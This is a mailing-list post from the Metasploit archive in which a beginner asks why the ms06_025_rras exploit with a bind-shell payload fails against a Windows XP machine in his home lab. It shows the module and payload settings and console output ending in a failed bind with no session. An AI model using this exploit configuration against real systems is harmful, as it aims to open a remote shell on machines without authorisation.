Metasploit mailing list archives

ms06_025-rras + windows/shell_bind_tcp Failing to Bind


From: Mike E-Wire Mail <mikeody () e-wire net au>
Date: Mon, 04 Jan 2010 11:01:27 +0800

A very basic issue I am sure for which I apologise - but newbies have to start somewhere. Can anyone give me a clue as to why this isnt working please ?

2 PCs on same network via Netgear Router - target = 192.168.0.5, Host 192.168.0.3], no firewalls or virus software running on either.

msf exploit(ms06_025_rras) > show options
Module options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.0.5      yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  SRVSVC           yes       The pipe name to use (ROUTER, SRVSVC)

Payload options (windows/shell_bind_tcp):
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique: seh, thread, process
  LPORT     4444             yes       The local port
  RHOST     192.168.0.5      no        The target address

Exploit target:
  Id  Name
  --  ----
  1   Windows XP SP1

msf exploit(ms06_025_rras) > exploit

   * Started bind handler
* Binding to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_np:192.168.0.5[\SRVSVC] ... [-] Exploit failed: Could not bind to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_np:192.168.0.5[\SRVSVC]
   * Exploit completed, but no session was created.

msf exploit(ms06_025_rras) >

I get EXACTLY the same result if the target has NO SPs or just SP1. Also same result if I try a reverse shell payload [windows/shell_reverse_tcp]. Have also tried from both Windows and Linux - same result.

Thanks
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: